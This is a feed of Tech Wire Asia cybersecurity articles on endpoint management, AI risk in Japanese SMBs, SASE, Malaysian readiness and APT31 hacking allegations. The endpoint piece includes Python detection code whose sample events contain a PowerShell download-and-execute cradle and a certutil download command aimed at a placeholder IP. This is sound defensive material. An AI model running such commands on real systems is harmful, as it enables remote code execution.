Cybersecurity - Tech Wire Asia
https://techwireasia.com/tag/cybersecurity/
Feed generated Wed, 24 Apr 2024 05:54:46 +0000

The criticality of endpoint management in cybersecurity and operations
https://techwireasia.com/04/2024/endpoint-management-systems-the-best-and-how-to-achieve-safety/
Wed, 24 Apr 2024 05:54:46 +0000

Endpoint security and management are the foundation for a safer, more reliable network in 2024. We consider some steps organisations can take to secure their endpoints.

Most events that lead to a loss, corruption, or data theft happen on the devices we use to get a day’s work done. In computing terminology, those devices are called endpoints, and the definition extends to any computing device capable of connecting to, and communicating with, an organisation’s network.

Many endpoint devices are commonly recognisable: the smartphone in your back pocket, the desktop computer or laptop. However, endpoints can also include servers – powerful computers that provide digital services to users, such as file storage, data retrieval, or commonly used applications. When all an organisation’s endpoints are added up, they can number hundreds of thousands in large enterprises.


Often, even discovering the existence of every endpoint is challenging, a situation made more complicated by the COVID-19 pandemic and the continuing practice of remote working. Endpoints suddenly included computers in people’s homes and personal laptops used during periods of lockdown.

Within a couple of years of 2020, the number of endpoints on company networks rose sharply, and the number of cybersecurity incidents involving endpoints rose in step. The cost of each security breach also rose, from $7.1m to $8.94m.

The higher number of endpoints in today’s businesses also means that more devices have at least the capability to delete, corrupt or compromise valuable data. Managing endpoints therefore means ensuring that devices remain safe, whether the risk comes from attackers, from misuse or from operator error.

It’s clear, therefore, that managing and securing these devices needs to be at the forefront of any organisation’s cybersecurity and device management priorities. A properly managed and monitored endpoint fleet gives IT teams a clear definition of the devices they are responsible for and a head start on tracking down and responding to incidents, whether caused by external attackers or by insiders. It also shows which devices are at greater risk of compromise, telling teams which endpoints need updating, patching or replacing, and with what priority.

Putting in place a rigorous endpoint management system gives organisations the best ROI of any security platform, and should be the foundation of a range of measures designed to protect the organisation’s users, digital assets and intellectual property.

Best practices in endpoint management are discussed in detail in “The Endpoint Defense Playbook: Locking Down Devices with NinjaOne”, which includes advice on how large fleet management tasks can be automated. But for the purposes of this article, let’s consider some steps that any company can take to close off many of the ways that endpoints put their owners’ digital assets at risk.

Audit
Before an IT team can know what it needs to monitor, manage and protect, it has to know what devices appear on the network. An inventory audit is therefore the unambiguous first step, but auditing has to be an ongoing process: endpoints change day to day as the organisation evolves and devices are replaced, so a single snapshot goes stale quickly. What is required is a continuously updated picture of the network, reconciled against the list of devices the organisation believes it owns.
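As an added example (not code from the original article or from any product it mentions), the following Python script performs the reconciliation step of a continuing audit: it parses an ARP-table listing for the devices actually present on the wire and compares them with an authorised inventory, flagging devices that are unknown, inventory devices whose management agent has gone silent, and inventory entries not seen at all. The ARP text, the inventory records and the 30-day staleness threshold are constructed assumptions; in practice the observed set would come from switch, DHCP or ARP exports and the inventory from the endpoint-management platform or CMDB.

```python
"""Continuous endpoint audit: reconcile what is seen on the network
against the authorised asset inventory.

Added example, not code from the original article.  The ARP-table
text and the inventory records below are constructed sample data; in
practice they would come from switch/DHCP/ARP exports and from the
CMDB or endpoint-management platform.
"""
from dataclasses import dataclass
from datetime import date, timedelta

# Constructed sample in the format of `arp -a` on Linux:
# "hostname (ip) at mac [ether] on iface"; unresolved hosts show "?".
SAMPLE_ARP = """\
? (10.0.1.10) at 00:1a:2b:3c:4d:01 [ether] on eth0
fileserver.corp (10.0.1.20) at 00:1a:2b:3c:4d:02 [ether] on eth0
? (10.0.1.77) at de:ad:be:ef:00:01 [ether] on eth0
? (10.0.1.90) at 00:1a:2b:3c:4d:09 [ether] on eth0
"""


@dataclass
class Asset:
    mac: str
    owner: str
    last_seen: date  # last check-in of the management agent (constructed)


# Constructed inventory: what the organisation believes it owns.
INVENTORY = [
    Asset("00:1a:2b:3c:4d:01", "alice", date(2024, 4, 22)),
    Asset("00:1a:2b:3c:4d:02", "infra", date(2024, 4, 23)),
    Asset("00:1a:2b:3c:4d:03", "bob", date(2024, 1, 5)),    # not on the wire
    Asset("00:1a:2b:3c:4d:09", "carol", date(2024, 2, 1)),  # on the wire, agent silent
]


def parse_arp(text):
    """Return {mac: ip} from `arp -a` style lines; malformed lines are skipped."""
    seen = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[2] != "at":
            continue
        ip = parts[1].strip("()")
        mac = parts[3].lower()
        if mac != "<incomplete>":
            seen[mac] = ip
    return seen


def reconcile(observed, inventory, today, stale_after=timedelta(days=30)):
    """Classify endpoints:
    - unknown: on the wire but not in the inventory (rogue or unregistered BYOD)
    - silent:  in the inventory and on the wire, but the agent has not
               reported within stale_after (unmanaged, agent removed, unpatched)
    - missing: in the inventory but not observed (lost, stolen, decommissioned)
    """
    by_mac = {a.mac.lower(): a for a in inventory}
    unknown = {m: ip for m, ip in observed.items() if m not in by_mac}
    silent = [a for m, a in by_mac.items()
              if m in observed and today - a.last_seen > stale_after]
    missing = [a for m, a in by_mac.items() if m not in observed]
    return {"unknown": unknown, "silent": silent, "missing": missing}


def audit(today=date(2024, 4, 24)):
    """Run the reconciliation over the constructed sample data."""
    return reconcile(parse_arp(SAMPLE_ARP), INVENTORY, today)


if __name__ == "__main__":
    result = audit()
    for mac, ip in result["unknown"].items():
        print(f"UNKNOWN  {mac} {ip}")
    for a in result["silent"]:
        print(f"SILENT   {a.mac} owner={a.owner} last_seen={a.last_seen}")
    for a in result["missing"]:
        print(f"MISSING  {a.mac} owner={a.owner}")
```

Each of the three buckets maps to a different follow-up: an unknown MAC is a candidate for network quarantine until identified, a silent asset needs its agent reinstalled before it falls behind on patching, and a missing asset should be checked against the leavers and loss reports. Running this on a schedule, rather than once, is what turns a one-off audit into the real-time map the article calls for.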

Secure access
Users, like endpoints, have to prove who they are before being granted privileges on the company’s network. Passwords and two-factor authentication are the means by which employees authenticate; single sign-on (SSO) lets a single authentication be reused across the organisation’s applications. Access rights are then granted to the authenticated identity, not to whoever happens to be connected to the network.

Zero-trust
Zero trust is a security posture in which users and endpoints have no privileges on a network by default. Policies then grant access to specific applications, services and devices per request, based on the identity making the request and the state of the device it comes from. Where no policy matches, the default of no access applies.

Encrypt
Encrypting data in transit means that traffic crossing the network, whether internal or to and from the outside, cannot be read by anyone who intercepts it without the key (it still reveals that the two parties communicated, so it protects content, not the fact of communication). Data at rest should also be encrypted, so that physical theft of, for instance, a storage drive or laptop yields nothing readable to a third party. Both depend on the keys being managed properly: a key stored alongside the data it protects gives no protection at all.

BYOD policies
Since the emergence of the modern smartphone in the mid-2000s, users have often preferred the convenience of using their own devices, at least occasionally. BYOD (bring your own device) policies determine which device types are allowed and stipulate which operating system and software versions may connect to the network. Enforced policies keep insecure or unsupported operating systems and software off the network and hold security to a defined baseline across what is an unpredictable population of endpoints.

Proactive scanning
Endpoint detection and response (EDR) systems monitor endpoints continuously, record activity such as process, file and network events, and flag anomalous behaviour to users or to systems administrators. Alerts tell IT staff when action is needed against an apparent threat, or surface unusual patterns of behaviour that need further investigation.
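To make the kind of flagging described above concrete, here is an added example (not code from the original article or from any EDR product) that applies three detection rules to process-creation telemetry: an Office application spawning a script host, PowerShell launched with a base64 encoded command (decoded so the analyst sees the real payload), and certutil being used to download a file. The JSON event lines are constructed, with fields modelled loosely on Sysmon event ID 1; the three rules are well-known tradecraft patterns and are illustrative, not a complete rule set.

```python
"""Flag anomalous endpoint activity from process-creation telemetry, the
kind of signal an EDR agent collects.

Added example, not code from the original article or from any EDR
product.  The events below are constructed; rules are illustrative.
"""
import base64
import json
import re

# PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed newline-delimited JSON events (parent image, image, command line).
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"host": "ws-12", "user": "alice", "parent": "explorer.exe",
     "image": "outlook.exe", "cmdline": "outlook.exe"},
    {"host": "ws-12", "user": "alice", "parent": "winword.exe",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"host": "ws-07", "user": "bob", "parent": "cmd.exe",
     "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.5/x.exe x.exe"},
    {"host": "ws-07", "user": "bob", "parent": "explorer.exe",
     "image": "powershell.exe", "cmdline": "powershell.exe Get-Process"},
])

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Matches "-e", "-enc" or "-encodedcommand" followed by a base64 blob.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(event_lines):
    """Apply the rules to newline-delimited JSON events; return a list of alerts."""
    alerts = []
    for line in event_lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"]
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            alerts.append({"host": ev["host"], "rule": "office_spawns_script_host",
                           "detail": f"{parent} -> {image}"})
        if image == "powershell.exe":
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                alerts.append({"host": ev["host"], "rule": "encoded_powershell",
                               "detail": decoded})
        if image == "certutil.exe" and "-urlcache" in cmd.lower() and "http" in cmd.lower():
            alerts.append({"host": ev["host"], "rule": "certutil_download",
                           "detail": cmd})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['host']}  {a['rule']}: {a['detail']}")
```

The same logic normally sits in the EDR’s own rule engine or in a SIEM over forwarded telemetry; the value of the encoded-command rule is that the decoded script text, not the base64 blob, is what an analyst needs in order to triage the alert.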


Patch & update
Software vendors continually release fixes for vulnerabilities found in their code. Endpoints should run current, supported versions of all software, including the operating system, so that no device carries a known, already-patched weakness that an attacker can use as an entry point. Zero-trust policies apply here too: an endpoint that is not fully up to date can be denied access, or confined to limited privileges, until it has been patched.
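The zero-trust, BYOD and patching sections above all describe one mechanism from different angles: an access decision that defaults to deny and that weighs both who is asking and the state of the device they are asking from. The following Python is an added example of that decision logic (not code from the original article or from any product): a request carries the user, whether MFA succeeded, the resource wanted and the endpoint’s posture; a small rule table grants access only where a rule explicitly matches, BYOD device types outside an allowed list are refused outright, and an endpoint that is otherwise legitimate but below the minimum patch level is given a limited rather than a full grant. The rules, groups, minimum OS versions and allowed BYOD platforms are constructed assumptions.

```python
"""Default-deny access decision combining user authentication state and
endpoint posture.

Added example, not code from the original article or any product.  The
rules, groups, minimum patch levels and BYOD allow-list are constructed;
the point is the decision model: deny unless a rule explicitly grants,
and limit rather than grant when the endpoint is out of date.
"""
from dataclasses import dataclass, field


@dataclass
class Endpoint:
    os: str                 # "windows", "macos", "ios", "android", "linux"
    os_version: tuple       # e.g. (10, 0, 19045); compared as a tuple
    managed: bool           # enrolled in endpoint management (False = BYOD)
    disk_encrypted: bool
    edr_running: bool


@dataclass
class Request:
    user: str
    mfa_passed: bool
    resource: str
    endpoint: Endpoint


@dataclass
class Rule:
    resource: str
    requires_managed: bool = False
    requires_mfa: bool = True
    allowed_groups: set = field(default_factory=set)


# Constructed policy data.
MIN_OS_VERSION = {"windows": (10, 0, 19045), "macos": (14, 4), "ios": (17, 4)}
BYOD_ALLOWED_OS = {"ios", "macos"}
RULES = [
    Rule("wiki", requires_managed=False, allowed_groups={"staff", "contractor"}),
    Rule("hr-db", requires_managed=True, allowed_groups={"hr"}),
]
GROUPS = {"alice": {"staff", "hr"}, "bob": {"staff"}, "eve": {"contractor"}}


def posture_ok(ep):
    """Return (healthy, reasons) for the endpoint's patch and protection state."""
    reasons = []
    minimum = MIN_OS_VERSION.get(ep.os)
    if minimum is None:
        reasons.append(f"unsupported os {ep.os}")
    elif ep.os_version < minimum:
        reasons.append(f"{ep.os} {ep.os_version} below minimum {minimum}")
    if not ep.disk_encrypted:
        reasons.append("disk not encrypted")
    if ep.managed and not ep.edr_running:
        reasons.append("EDR agent not running")
    return (not reasons, reasons)


def decide(req):
    """Return ("allow" | "limited" | "deny", reason).

    No matching rule means deny (zero trust).  A request that passes every
    rule but comes from an out-of-date endpoint gets "limited", e.g. a
    remediation network or read-only access, instead of full access.
    """
    ep = req.endpoint
    if not ep.managed and ep.os not in BYOD_ALLOWED_OS:
        return "deny", f"BYOD device type {ep.os} not permitted"
    rule = next((r for r in RULES if r.resource == req.resource), None)
    if rule is None:
        return "deny", f"no policy grants access to {req.resource}"
    if rule.requires_mfa and not req.mfa_passed:
        return "deny", "MFA required"
    if not GROUPS.get(req.user, set()) & rule.allowed_groups:
        return "deny", f"{req.user} not in an allowed group for {req.resource}"
    if rule.requires_managed and not ep.managed:
        return "deny", f"{req.resource} requires a managed endpoint"
    healthy, reasons = posture_ok(ep)
    if not healthy:
        return "limited", "; ".join(reasons)
    return "allow", "policy matched and posture healthy"


if __name__ == "__main__":
    patched = Endpoint("windows", (10, 0, 19045), True, True, True)
    stale = Endpoint("windows", (10, 0, 19041), True, True, True)
    byod = Endpoint("ios", (17, 4), False, True, False)
    for r in (Request("alice", True, "hr-db", patched),
              Request("alice", True, "hr-db", stale),
              Request("eve", True, "wiki", byod),
              Request("eve", True, "wiki", Endpoint("android", (14,), False, True, False)),
              Request("alice", True, "finance", patched)):
        print(r.user, r.resource, decide(r))
```

Note the ordering: the cheap identity checks (MFA, group membership) run before the posture check, and every deny carries a reason string, because an access-denied event with no reason is the first thing a help desk will ask about when the policy goes live.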

Remediation planning
Despite all preventive measures, every network will suffer security or misuse incidents. IT teams must have coherent plans to follow when a data breach or corruption is suspected. Remediation planning also means rehearsing recovery procedures, so that teams know the steps to take when an incident occurs rather than working them out under pressure.

Next steps
Endpoint management and security are mutually supportive processes that together form the basis for strong IT security and data loss prevention. In very small companies, it’s possible to manually implement endpoint management on a per-device basis. But in the majority of cases, an endpoint management software platform is necessary to oversee and, where possible, automate management policies.

Creating a strong and safe IT environment for any organisation is essential for a business to operate in 2024, and it’s a subject that requires a great deal of attention. You can read in more detail about the best practices to implement endpoint management in “The Endpoint Defense Playbook: Locking Down Devices with NinjaOne”, which is available to download now.

How Japan balances AI-driven opportunities with cybersecurity needs
https://techwireasia.com/04/2024/the-future-of-ai-in-japan-opportunities-and-challenges-for-smbs/
Tue, 09 Apr 2024 01:00:49 +0000

  • For Japan, the integration of AI in various sectors shows a promising blend of innovation and caution.
  • The significant shortage of cybersecurity professionals in Japan underscores urgent and strategic responses to this growing gap.
  • Organizations and governments worldwide, including Japan, face the dual challenge of mitigating risks and embracing the rapid advancements in AI. This involves managing uncertainties while also accelerating innovation and adoption to reap the benefits of this transformative technology.

    Japan’s unique position in AI

    Although Japan is known for its cautious approach to risk, it is also renowned for its innovative contributions to technology, particularly in smart robotics and automotive AI. However, reports suggest that Japan’s prowess in AI-powered hardware does not equally extend to its software capabilities, making it reliant on foreign large language models for generative AI.

    Japan faces unique AI development and adoption hurdles, including limited data availability and cultural attitudes towards business risk. These factors complicate the integration of AI technologies within traditional business frameworks.

    A recent study by Barracuda, titled ‘SMB cyber resilience in Japan: Navigating through doubt to an AI-powered future,’ examines AI’s impact on small to medium-sized businesses (SMBs) in Japan. It reveals a mix of optimism about AI’s benefits and concerns about security, knowledge, and skill gaps.

    The research underscores general optimism among smaller Japanese organizations about the positive effects of AI on business operations. The majority of these businesses anticipate that adopting AI solutions will lead to workforce reductions over the next two years—66% foresee fewer full-time employees, and 70% expect to rely less on freelancers and contractors. This trend is expected to lower costs and reduce the human resource demands on companies, though it also highlights a precarious future for workers in roles vulnerable to automation.

    In addition to cost reduction, businesses expect AI to enhance operational efficiencies across various functions, including marketing and customer relations. Approximately 67% predict that AI tools will produce over half of their content soon, and 60% believe AI will become the primary interaction point for customers. Moreover, thanks to AI, 76% anticipate quicker and more accurate customer insights.

    Strengthening cybersecurity through AI

    On a broader scale, 65% of respondents are confident that AI tools can streamline their cybersecurity needs, reducing reliance on human security teams or third-party services. Given Japan’s acute shortage of cybersecurity professionals, integrating AI for automated threat detection and response is seen as essential for enhancing security across all business sizes.

    Most organizations recognize the need for external assistance to fully leverage AI for business benefits. A significant majority of businesses surveyed (76%) indicate that they need partners for researching and exploring AI, and a similar proportion (77%) seek help with implementing AI solutions and managing them on an ongoing basis. Security vendors and managed service providers in Japan are well-positioned to help smaller businesses exploit AI’s advantages.

    The release of ChatGPT by OpenAI in November 2022 showcased the capabilities of generative AI tools in creating natural, engaging dialogues. Despite widespread attention, businesses exhibit cautious engagement with generative AI. Awareness does not equate to comprehensive understanding; 56% grasp the distinctions between generative AI and other AI types like machine learning, while 44% admit to limited or no understanding. Consequently, many Japanese companies impose restrictions on AI use due to potential risks.

    Approximately 69% of businesses perceive risks with workplace generative AI usage. While 18% permit its use—6% broadly and 12% in limited team settings—62% do not officially sanction it, suggesting covert use that may heighten security risks. Concerns also include data protection (57% of respondents), the absence of regulatory frameworks (47%), and opaque AI decision processes (31%). Additionally, 13% fear AI systems being compromised by cyber attackers.

    Risks of using generative AI

    Risks of using generative AI (Source – Barracuda)

    AI and cyber threat evolution

    There’s notable uncertainty about AI’s role in evolving cyber threats. About 55% of businesses are unsure how AI could be utilized in email attacks, with similar uncertainty extending to denial-of-service (62%), malware (57%), API attacks (56%), and cyber espionage (55%).

    Despite these uncertainties, email threats remain a prominent concern for Japanese small businesses, with 53% highlighting account takeover attacks as a top threat. This form of identity theft allows attackers to misuse accounts, potentially leading to phishing scams, data theft, and more. Other significant threats include phishing and social engineering (37%), with ransomware also critical (39% reported it as a top concern, predominantly initiated via email).

    Cyber threats concerning businesses in Japan

    Cyber threats concerning businesses in Japan (Source – Barracuda)

    Survey participants generally understand the role of AI in fortifying cyber defenses, especially in areas like email security and employee cybersecurity training. However, there’s some ambiguity about AI’s effectiveness in other domains, possibly due to these areas being less familiar to smaller enterprises.

    When asked which AI-enhanced security measures would improve their organizational safety, 36% pointed to AI-enhanced email security, especially against sophisticated threats like deepfakes. Another 24% believed AI could support more tailored, frequent training programs. The benefits of AI in continuous threat intelligence and response, as performed by Security Operations Centers (SOCs), were not as clearly understood.

    The survey reveals a deficiency in AI-specific practices and policies needed for responsible AI usage. While 52% of businesses conduct employee training on AI use and vulnerabilities, only 35% have formal policies dictating AI usage. Even fewer have comprehensive governance structures in place, such as legal frameworks. This indicates a lack of control and management over AI applications within businesses.

    The latest ISC2 Cybersecurity Workforce Study shows that Japan has nearly half a million cybersecurity professionals, a 23.8% increase on the previous year against a global average of 8.7%. Despite this growth, demand far exceeds supply: the shortfall stands at 110,254 professionals, a 97.6% increase year on year, against a global average increase of 12.6%. No other nation evaluated in the ISC2 study shows its gap growing this fast.

    This macro perspective mirrors smaller businesses’ daily challenges, particularly with AI-driven cyber threats.

    Makoto Suzuki, Regional Sales Director for Japan at Barracuda, highlights the survey’s findings: Japanese SMBs recognize AI’s benefits for enhancing business productivity but remain cautious about the cyber threats it poses. Suzuki notes, “This could hold businesses back from harnessing the full potential of AI to revolutionize business performance and competitiveness by optimizing processes, reducing costs, improving quality, and providing new insights and ideas.”

    Deploying SASE: Benchmarking your approach
    https://techwireasia.com/04/2024/verizon-deploying-sase-benchmarking-your-approach/
    Tue, 09 Apr 2024 00:48:02 +0000

    Explore the latest research on deploying Secure Access Service Edge (SASE), uncovering best practices and real-world case studies to benchmark your approach in network security and architecture.

    This is part one of an article based on research conducted by S&P Global Market Intelligence, in which we reveal current best practices for deploying SASE.

    A change is occurring in how organisations secure their network perimeters, users, applications and data. Secure access service edge (SASE) is starting to disrupt traditional approaches to networking and security, and is giving IT professionals an opportunity to fundamentally reimagine how they design their network and security architectures.

    Previously, enterprise network architecture was based on discrete silos of network and security controls, with remote access provided via virtual private networks (VPNs). These approaches are increasingly being replaced by SASE and zero-trust network access (ZTNA) architectures, which grant access per user and per application rather than to the network as a whole.


    Getting SASE right can be a complex proposition that presents significant challenges. While major elements that make up SASE have been around in some form for at least 10 years, it is still an evolving technology.

    A case study in SASE success: India Insurance Company

    As part of the research commissioned by Verizon Business to help companies cut through the noise to get a true picture of obstacles and opportunities in implementing SASE, S&P Global Market Intelligence conducted 10 in-depth interviews with decision makers and those purchasing SASE technology.

    One successful SASE implementation was described in an interview with an executive vice president at one of the largest insurance companies in India, which we will refer to as “IIC” (India insurance company).

    “The primary driver [for SASE] was the pandemic. Before, we had a traditional bricks-and-mortar office infrastructure. When the pandemic hit, everything was being provisioned by the company. There was no way to use ‘bring your own devices (BYOD) – only company-owned, hardened machines could be used […] which took 10-15 days to provision,” he said.

    Suddenly, many users, particularly contractors, did not meet security requirements because controls were not designed for off-site workers. In response, IIC implemented a SASE project focused initially on data access, followed by applications.

    “Now, we can fully support BYOD, which was the hardest problem to solve. We were forced to go with an agentless approach, through an outside portal […] new employees and contractors are now productive from day one instead of waiting for their machine to arrive,” said the respondent, an Executive Vice President and Head of Business Systems and Infrastructure at the IIC, which currently employs over 10,000 people.

    The company could immediately improve the user experience, meet remote worker security and compliance requirements, and improve productivity by supporting BYOD, which enabled employees and contractors to begin work immediately.

    What is driving SASE adoption?

    Drivers of SASE adoption vary with the size and maturity of the organisation. For more mature, technically sophisticated enterprises, SASE implementations are motivated more by business and digital transformation needs than by technical requirements.

    Common business drivers include improved business agility, cost reduction, support for hybrid work (office-based and remote workers), improved end-user experience, reduced threat impact and risk, improved compliance and competitive pressure.


    Larger organisations, especially those with over 10,000 employees, tend to suffer from technical debt and incompatible legacy systems that slow down deployments. Conversely, smaller organisations tend to adopt solutions faster and can often source the entire SASE stack from a single vendor.

    Common technical drivers include network and security modernisation, IT simplification, and simpler management of rapidly growing networks.

    Key considerations for implementing SASE

    Research participants indicated a variety of deployment approaches. None indicated embarking on a “big bang” implementation: some organisations rolled SASE out to high-risk users and apps first, while others chose lower-risk users and applications.

    For example, some organisations with high short-term risk exposure, such as the potential for breaches or failed compliance audits, chose to solve the problem for those groups first. Others, less concerned about short-term risk, took a more conservative approach, such as deploying first to staff already using modern cloud apps.

    “It was all about basic access first to support the remote workforce. Subsequently, it was about business-critical targets and high-risk estates, with quick wins peppered in between,” said one respondent, a Regional Information Security Manager for a large Australian IT services company.

    “Any users who can migrate without losing any access to unsupported apps naturally will do so. This provides a faster, better user experience that rewards the user to move to SASE. They were excited to move away from VPN and use [it] as a […] fall-back plan,” said another, a Regional CISO at a large Singapore engineering firm.

    Overall, SASE projects vary in duration (from initial sign-off to production) from 6-12 months to more than three years. Nearly half (45%) of respondents indicated durations of 12 months or less; another 45% fell in the 13 to 36 month range; and the remaining 10% took more than three years to complete a SASE implementation.

    In Asia Pacific, only one-third of participants indicated that SASE was deployed as part of a digital transformation initiative, as compared with three-quarters of their counterparts in Europe.

    End matters

    In the next part of this article, we’ll look more deeply into the study’s results and get the thoughts of Rob Le Busque, Regional Vice President at Verizon, APAC. In the meantime, the report produced in collaboration with S&P Global Market Intelligence, together with the accompanying business impact briefs, details the experiences of enterprises that have already migrated to SASE.

    Cybersecurity in Malaysia: A reality check on readiness and resilience
    https://techwireasia.com/04/2024/the-2024-cybersecurity-challenge-where-malaysia-stands/
    Tue, 02 Apr 2024 01:00:42 +0000

  • Only 2% of organizations in Malaysia are deemed ‘Mature’ in cybersecurity readiness.
  • The Malaysian government introduces the Cyber Security Bill 2024 to strengthen national cybersecurity measures.
  • Malaysia is no stranger to the cybersecurity landscape, having been involved in and targeted by a significant number of cyberattacks and data leaks. These incidents raise questions about the country’s readiness to face cyber threats within this evolving cybersecurity environment.

    The 2024 Cybersecurity Readiness Index for Malaysia

    In Cisco’s 2024 Cybersecurity Readiness Index, it is revealed that only two percent of organizations in Malaysia are classified at the ‘Mature’ level for readiness. This classification indicates robust resilience against the myriad of modern cybersecurity risks that today’s businesses face.

    This critical assessment arrives at a time when hyperconnectivity defines our era, alongside a threat landscape that is rapidly evolving. Businesses are incessantly bombarded with sophisticated cyber threats, ranging from phishing and ransomware to supply chain attacks and social engineering tactics. Despite concerted efforts to fortify defenses against these onslaughts, many organizations are burdened by their complex security frameworks, which often consist of disparate point solutions.

    The complications of defending against cyber threats are further amplified in today’s distributed work environment, where organizational data is dispersed across a vast array of services, devices, applications and user interfaces.

    Yet, despite these daunting challenges, a surprising 85% of companies profess moderate to high confidence in their cybersecurity defenses, regardless of their actual state of preparedness. This disparity between perceived confidence and measured readiness points to a potentially dangerous overestimation of their capabilities and a failure to gauge the magnitude of the threats they face.

    The 2024 Cisco Cybersecurity Readiness Index undertakes a comprehensive examination of organizational preparedness against cyber threats across five critical domains: identity intelligence, network resilience, machine trustworthiness, cloud reinforcement and AI fortification. These domains encompass 31 distinct solutions and capabilities, evaluated through a double-blind survey of more than 8,000 security and business leaders across the globe.

    2% of organizations in Malaysia are classified at the ‘Mature’ level for readiness. (Source – Cisco)

    The survey’s respondents were asked about their deployment of these cybersecurity measures, classifying them into four ascending stages of readiness: Beginner, Formative, Progressive, and Mature.

    Jeetu Patel, Cisco’s Executive Vice President and General Manager of Security and Collaboration, cautions against the peril of overconfidence within the organizational psyche, advocating for a strategic shift towards integrated security platforms and leveraging AI to scale defense mechanisms effectively.

    The findings from the study paint a grim picture of readiness among Malaysian companies, with a mere two percent poised to effectively counter contemporary cyber threats. A significant majority find themselves at the lower echelons of cybersecurity maturity, ill-prepared for the inevitabilities of the cyber threat landscape.

    Forecasting cyber risks and financial implications

    Moreover, the study forecasts a high likelihood of future cybersecurity incidents and sheds light on the financial ramifications of such breaches, with some incidents costing organizations upwards of US$300,000. The reliance on multiple cybersecurity point solutions has proven counterproductive, hampering the swift detection, response, and recovery from incidents. This issue is exacerbated by the admission from a vast majority that the cumbersome management of numerous point solutions slows their security operations.

    The survey also highlights the pervasive issue of unmanaged device access, critical talent shortages, and the ambitious plans of organizations to significantly bolster their IT infrastructures and cybersecurity measures in the near term. This includes a notable emphasis on upgrading existing solutions, deploying new technologies, and a considerable increase in cybersecurity budgets.

    Addressing the complex challenges posed by today’s threat landscape necessitates a concerted effort from companies to accelerate their investment in security infrastructure, adopt innovative security measures, and embrace a platform-based approach to cybersecurity. This strategy is essential for enhancing network resilience, making meaningful use of AI, and bridging the significant cybersecurity skills gap.

    Hana Raja, Managing Director of Cisco Malaysia, underscores the complexity of the current cybersecurity environment, pointing out the lag in cyber resilience among organizations globally, including those in Malaysia. Raja advocates for a comprehensive platform approach to cybersecurity, which promises a simplified, secure, and holistic view of an organization’s security posture, enabling businesses to better navigate and exploit the advantages of emerging technologies amid the ever-evolving threat landscape.

    The first reading of the Cyber Security Bill 2024

    Recognizing that only a small fraction of companies in Malaysia achieve a “Mature” status in cybersecurity preparedness, the Malaysian government acknowledges the critical need to bolster cybersecurity nationwide. Consequently, the Cyber Security Bill 2024 has been introduced, marking its initial reading in Parliament. Aimed at strengthening national cybersecurity, this legislative proposal was presented by Digital Minister Gobind Singh Deo on March 25th.

    The Star reported that the bill is scheduled for a second reading during the ongoing session of the Dewan Rakyat. It outlines a comprehensive approach to raising cybersecurity standards: it mandates adherence to specific measures and standards for improved national security and details protocols for managing cybersecurity incidents that affect the country’s critical national information infrastructure.

    Additionally, the legislation proposes the creation of a National Cyber Security Committee and defines the responsibilities and authority of the National Cyber Security Agency’s chief executive officer. It includes provisions for the licensing of cybersecurity service providers and establishes the role of a national critical information infrastructure sector lead.

    According to the bill, the Digital Minister, following recommendations from the chief executive, may designate any government body or individual as the sector lead for national critical information infrastructure, potentially appointing multiple leads for various sectors. These appointments will be officially announced on the National Cyber Security Agency’s website.

    The sector leads will be responsible for developing a code of practice and creating and updating guidelines on best practices for managing cybersecurity. The National Cyber Security Agency has stated that the proposed bill will legally empower it to define and enforce cybersecurity standards for entities deemed as National Critical Information Infrastructure. Failure to comply with these standards could result in legal repercussions.

    Global concerns rise over alleged cyber hacking activities linked to China
    https://techwireasia.com/03/2024/global-concerns-rise-over-alleged-cyber-hacking-activities-linked-to-china/
    Wed, 27 Mar 2024 01:00:36 +0000

  • China faces global backlash over hacking allegations.
  • The U.S., UK, New Zealand, and Australia have taken a stand, emphasizing the need for cybersecurity and the protection of democratic values.

    China finds itself at the heart of global scrutiny once more. Following its recent shift in tech policy, including the move to phase out AMD and Intel microprocessors in governmental applications, serious allegations have emerged from the U.S. and the UK. Authorities in these countries have leveled charges, imposed sanctions, and accused Beijing of orchestrating a vast cyberespionage campaign, reportedly affecting millions, including lawmakers, academics, journalists, and companies, notably in the defense sector.

    Termed Advanced Persistent Threat 31, or “APT31,” this hacking ensemble is characterized by officials as a branch of China’s Ministry of State Security. A broad spectrum of individuals and entities has been identified as targets, encompassing White House personnel, U.S. senators, British legislators, and international officials critical of Beijing, as reported by Reuters.

    Although specific victims have not been fully disclosed, it’s clear that over the past decade, these hackers have penetrated defense contractors, dissidents, and various sectors in the U.S., such as steel, energy, and apparel. They’ve also targeted leaders in 5G and wireless technology, extending even to the spouses of prominent U.S. officials and lawmakers.

    Deputy U.S. Attorney General Lisa Monaco stated that the operation aimed to stifle criticism of the Chinese regime, compromise government institutions, and steal trade secrets.

    A recent indictment of seven alleged Chinese hackers has brought to light the magnitude of their operations, detailing breaches involving work accounts, personal emails, and more, impacting millions in the U.S. British officials have also highlighted APT31’s hacking of key UK lawmakers and have connected another group of Chinese spies to a significant breach of Britain’s electoral commission.

    International reactions and repercussions on the “China hacking”

    In response, Chinese officials in the UK and U.S. have dismissed these allegations as unfounded and slanderous.

    Amidst these disclosures, the UK and U.S. have sanctioned individuals and entities believed to be linked to China’s state security apparatus and involved in these cyber operations.

